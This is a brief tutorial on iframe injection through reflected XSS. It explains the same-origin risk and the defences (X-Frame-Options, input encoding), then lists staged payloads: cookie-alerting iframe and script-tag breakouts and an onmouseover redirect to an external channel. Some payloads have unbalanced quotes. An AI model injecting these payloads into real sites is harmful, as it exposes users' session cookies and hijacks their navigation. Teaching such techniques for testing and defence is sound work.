iFRAME-Injection

The IFRAME element may be a security risk if any page on your site contains an XSS vulnerability which can be exploited. 

If this is the case, the attacker can expand the XSS attack to any page within the same domain that can be persuaded to load within an <iframe> on the page with XSS vulnerability.

This is because content from the same origin (same domain) is allowed to access the parent content DOM (practically execute JavaScript in the "host" document). The only real protection methods from this attack is to add HTTP header X-Frame-Options: DENY and/or always correctly encode all user submitted data (that is, never have an XSS vulnerability on your site - easier said than done).

Below we shall look at a few examples of IFRAMES and how we can use them along with XSS to display different information.

You can view a video example of all of the below videos here - https://youtu.be/t5jdgj8ihwY

Stage 1 - Load the Cookie of the existing user

Here we can use the following to view the cookie of the current users sessions reflectively to the page as there is an XSS vulnerability present on the server. 

<IFRAME width="420" height="315" frameborder=0 onload="alert(document.cookie) ></IFRAME>&ParamHeight=250

Or using Script Tags

"></iframe><script>alert(document.cookie);</script>

>

Stage 2 - Loading Any text from the URL into the browser via Reflective XSS

></iframe><script>alert(`THIS IS A BACKTICK`);</script><iframe frameborder="0%EF%BB%BF&ParamHeight=250

Stage 3 - Using the 'mouseover' function

Here we use the 'mouseover' functions to that redirects a user to a custom defined website based on the users cursor moving into the iframe area.

You can view an example of this here - https://youtu.be/t5jdgj8ihwY

<IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href="https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg"></IFRAME>&ParamHeight=250